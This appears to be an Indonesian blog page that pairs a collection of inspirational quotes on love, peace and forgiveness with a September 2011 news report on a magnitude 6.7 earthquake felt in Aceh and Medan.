Pemaaf sejati hanya melekat bagi mereka yang berjiwa tangguh." Mohandas Gandhi
"Karena bukan di telingaku kau membisik, namun di hatiku.
Karena bukan di bibirku kau mengecup, namun di jiwaku." Judy Garland, Aktris Hollywood (1922-1969)
Kita tidak dapat memperoleh pikiran yang damai kecuali kita dapat berhubungan dengan
Sumber kedamaian yang yang ada di dalam diri kita. Damai yang kamu miliki dalam dirimu, dan jika kamu mencarinya di luar,kamu tidak akan pernah menemukannya.
(Maha Guru Ching Hai)
Bekerja dengan rasa cinta berarti melebur diri dengan jiwa sendiri,diri orang lain juga Tuhan (Kahlil Gibran)
Cinta sejati tidak datang kepadamu,tetapi harus datang dari dalam dirimu.
(Julia Roberts, aktris)
Anda tidak akan pernah salah selama selalu berpegang pada kebenaran.
(Sharon Stone, aktris)
"Dalam setiap keindahan, selalu ada mata yang memandang. Dalam setiap kebenaran, selalu ada telinga yang mendengar. Dalam setiap kasih, selalu ada hati yang menerima."
Ivan Panin, Matematikawan Rusia (1855-1942)
Cinta monyet: "Aku mencintai karena aku dicintai".
Cinta sejati: "Aku dicintai karena aku mencintai."
Cinta monyet: "Aku mencintaimu karena aku membutuhkanmu."
Cinta sejati: "Aku membutuhkanmu karena aku mencintaimu."
Erich Fromm, Pakar Sosiologis-Psikologi Sosial Filsuf Humanis
"Di tiap musibah yang menimpa Anda, ingatlah untuk bercermin
dan bertanya tentang daya apa yang bisa Anda upayakan guna menarik
pelajaran positif dari kejadian itu." (Epictetus, Filsuf Yunani)
Continue Reading

Tuesday, September 6, 2011


Ilustrasi
Ilustrasi

MEDAN - Gempa berkekuatan 6,7 SR mengguncang Aceh dan Medan, Sumatera Utara Selasa dinihari. Gempa yang berdurasi lebih kurang 10 detik tersebut pun sontak mengejutkan warga Medan yang tengah pulas.

Situs Badan Meteorologi Klimatologi dan Geofisika (BMKG), mencatat gempa terjadi pukul 00.55 WIB, Selasa (6/9/2011).

Lokasi gempa berada pada titik 2.81 LU - 97.85 BT. Pusat gempa berada 59 Km Timur laut Singkilbaru-Aceh. Atau 78 km Barat Daya Kabanjahe, Sumut. Sedangkan Pusat gempa berada di kedalaman 78 Km.

Sementara itu, pantauan okezone, di Jalan Dr Mansur Medan, sejumlah warga berhamburan keluar rumah. Suasana malam hari yang biasanya lengang pun mendadak ramai.

Menurut salah seorang warga, Arief, gempa yang berpusat di Singkil, Nangroe Aceh Darussalam (NAD) tersebut terjadi sekitar pukul 01.00 WIB. Karena takut adanya gempa yang lebih kuat, dirinya memilih keluar rumah.

"Terasa kali gempanya. Sekitar 10 detik gitulah," kata Arief di Medan, Selasa (6/9/2011).

Gempa yang terjadi dinihari ini juga menjadi perbincangan hangat di Facebook dan twitter warga. Belum diketahui adanya korban jiwa maupun kerugian materi akibat gempa tersebut.
Continue Reading